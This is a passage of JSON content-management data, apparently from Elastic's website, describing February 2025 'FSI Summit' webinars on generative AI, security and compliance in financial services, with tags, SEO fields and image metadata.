hunting","keyword":"threat-hunting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltba572dcfa2880a69","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:33:57.466Z","updated_at":"2023-11-06T21:33:57.466Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.696Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt484a944a3d130219","ACL":{},"created_at":"2023-11-06T20:39:33.494Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fraud-detection","label_l10n":"Fraud detection","tags":[],"title":"Fraud detection","updated_at":"2023-11-06T20:39:33.494Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.155Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - How unified data and AI transforms compliance oversight \u0026 risk detection at Fingerprint","token":"BIV1P5C61I","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T20:58:43.588Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/how-unified-data-and-ai-transforms-compliance-and-risk-detection","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"usMAo2XSbh27LLxzBDCZXY","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T20:59:03.613Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt92a13d327c8389ac","_version":3,"locale":"en-us","ACL":{},"created_at":"2025-02-18T08:45:09.000Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Enhancing customer experiences with genAI in Financial Services - The Elastic enabled bank","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eTraditional banking interfaces frustrate customers with impersonal interactions, clunky transaction searches, and static chatbots. How can banks transform these pain points into seamless, personalized experiences? Join \u003cstrong\u003eTim Brophy\u003c/strong\u003e, \u003cstrong\u003ePrincipal Solutions Architect at Elastic,\u003c/strong\u003e as he explores how semantic search and generative AI improve banking operations and customer engagement.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eSmarter transaction search: \u003c/strong\u003eMove beyond keyword matching with AI-powered semantic search for accurate, intent-driven results.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eIntelligent customer support: \u003c/strong\u003eCreate dynamic, real-time chatbot interactions that replace static FAQ-based systems.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eHyper-personalization: \u003c/strong\u003eDeliver tailored recommendations and offers using AI-driven insights.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eFraud detection \u0026amp; compliance: \u003c/strong\u003eStrengthen fraud prevention with AI models designed for financial security and regulatory compliance\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eDiscover how banks are using GenAI to enhance customer experiences, streamline operations, and drive engagement.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blte3f7364e8671cd09"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How Banks Use GenAI to Enhance Customer Experiences and Streamline Operations","seo_description_l10n":"Explore how Elastic’s GenAI-powered solutions improve banking experiences through smarter search, AI-driven chatbots, and personalized services. Watch the webinar now.","seo_keywords_l10n":"generative AI, genAI, banking experience, AI","seo_image":{"uid":"blt81689e34ccd9bb16","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Tim Brophy.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T08:43:14.070Z","updated_at":"2025-02-18T08:43:14.070Z","content_type":"image/png","file_size":"95407","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Tim_Brophy.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T19:56:54.326Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt81689e34ccd9bb16/67b44822fd5f931c2cfcbfee/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Tim_Brophy.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt9fb9f67ee7bb5c15","ACL":{},"created_at":"2023-11-06T20:50:46.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"real-time-analysis","label_l10n":"Real-time analysis","tags":[],"title":"Real-time analysis","updated_at":"2023-11-06T20:50:46.256Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:43.334Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"bltf4c040a3cb414ac0","ACL":{},"created_at":"2023-11-06T21:32:35.092Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"semantic-search","label_l10n":"Semantic search","tags":[],"title":"Semantic search","updated_at":"2023-11-06T21:32:35.092Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.425Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Enhancing customer experiences with genAI in Financial Services - The Elastic enabled bank","token":"A9IDKBSSZD","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T20:16:21.122Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/enhancing-cx-with-genAI-in-financial-services","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"EYjXg9FFT5nf558Ayq3JwE","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T20:16:25.901Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd8d0643d5690c9e4","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-02-18T08:58:30.362Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Modern security trends in Financial Services. How PayPlug tackles today's cyber threats","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs cyber threats grow more sophisticated and regulations tighten, payment companies must protect their systems without compromising speed and efficiency. For PayPlug, with numerous exposed endpoints, the challenge was clear: How can they guard against threats while ensuring seamless payment processing? Join \u003cstrong\u003eVictor Listrat, Head of Security Operations at PayPlug,\u003c/strong\u003e and \u003cstrong\u003eMandy Andress, CISO at Elastic\u003c/strong\u003e, as they explore how AI and automation are transforming security strategies in financial services.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eAI-powered threat detection: \u003c/strong\u003eHow machine learning helps PayPlug identify abnormal behavior and respond to threats faster.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eAutomated security: \u003c/strong\u003eThe role of Elastic agents in monitoring critical data and strengthening endpoint protection.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eUnified security platform: \u003c/strong\u003eThe benefits of consolidating security tools for real-time visibility and automated workflows.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eBalancing AI and compliance: \u003c/strong\u003eHow financial firms navigate AI-driven security while meeting evolving regulations like the EU AI Act.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eGain practical insights into protecting financial data and staying ahead of cyber threats with real-world strategies from payment industry leaders. Watch now to see how modern security tools keep financial services secure.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt8f7db4157fab33b3","blt2b463a692a3ffbfd"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How Financial Services Use AI and Automation to Strengthen Cybersecurity - The PayPlug use case","seo_description_l10n":"Learn how PayPlug uses AI-driven security and automation to protect financial data, detect threats, and meet compliance standards. Watch the discussion now.","seo_keywords_l10n":"AI, threat detection, compliance, financial services","seo_image":{"uid":"bltc78740532a300bb7","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Victor Listrat.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T08:55:12.498Z","updated_at":"2025-02-18T08:55:12.498Z","content_type":"image/png","file_size":"90442","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Victor_Listrat.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T20:00:58.230Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc78740532a300bb7/67b44af0fd5f93bc50fcc013/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Victor_Listrat.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Beginner","label_l10n":"Beginner","keyword":"beginner","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltb615bb59f2a540ed","created_by":"blt3e52848e0cb3c394","updated_by":"blt3e52848e0cb3c394","created_at":"2021-08-24T12:52:37.481Z","updated_at":"2021-08-24T12:52:37.481Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-01T14:18:24.950Z","user":"blt86e7fb24ab3b9a29"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Modern Security trends in Financial Services","token":"8NZL02YDKJ","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T20:15:13.707Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/modern-security-trends-in-financial-services-payplug-case","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"XikAxc11A3PtbmnXEvVnzu","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T20:15:19.905Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltb440c8289b782aeb","_version":3,"locale":"en-us","ACL":{},"created_at":"2025-02-18T09:32:31.227Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Shaping the Future of Financial Services with Elastic","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAt the Financial Services Summit, Elastic’s senior leadership, \u003cstrong\u003eCEO Ash Kulkarni,\u003c/strong\u003e \u003cstrong\u003eCIO Matthew Minetola\u003c/strong\u003e, and \u003cstrong\u003eCISO Mandy Andress\u003c/strong\u003e, explored how financial institutions can harness AI while ensuring resilience, security, and compliance. The discussion focuses on leveraging vast amounts of unstructured data while maintaining customer trust and staying ahead of cyber threats.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eAI in Financial Services: \u003c/strong\u003eGenAI presents an opportunity to automate document analysis and decision-making processes in financial services, improving analysis of everything from loan origination to risk assessment.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eData accessibility \u0026amp; quality: \u003c/strong\u003eEnsuring real-time access to proprietary business data for AI success.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eSimplification \u0026amp; scalability: \u003c/strong\u003eCIOs should consolidate fragmented systems into unified, cost-effective platforms.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eAI \u0026amp; security: \u003c/strong\u003eAdapting security strategies to AI-driven changes while maintaining transparency and compliance.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eComprehensive observability: \u003c/strong\u003eReal-time insights across operations, security, and applications for resilience.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eThe road ahead:\u003c/strong\u003e Moving AI projects into production, scaling capabilities, and maintaining trust in 2025.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eWatch now to explore the future of AI in financial services.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["bltfe609b8b6054e6ac","blt91aefbbce7bce7d9","blt8f7db4157fab33b3"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How AI is Transforming Financial Services – Insights from Elastic’s Leadership","seo_description_l10n":"Discover how AI, observability, and security are shaping the future of financial services. Watch Elastic’s senior leaders share strategies for success.","seo_keywords_l10n":"AI, observability, security, compliance, financial services","seo_image":{"uid":"blt93aa77f52a81bdcd","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_1200x627.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T09:24:37.538Z","updated_at":"2025-02-18T09:24:37.538Z","content_type":"image/png","file_size":"639140","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_1200x627.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T20:08:40.276Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt93aa77f52a81bdcd/67b451d5c9003fce9573f471/169165_-_Ad_Banners_for_FSI_Sunmmit_1200x627.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial 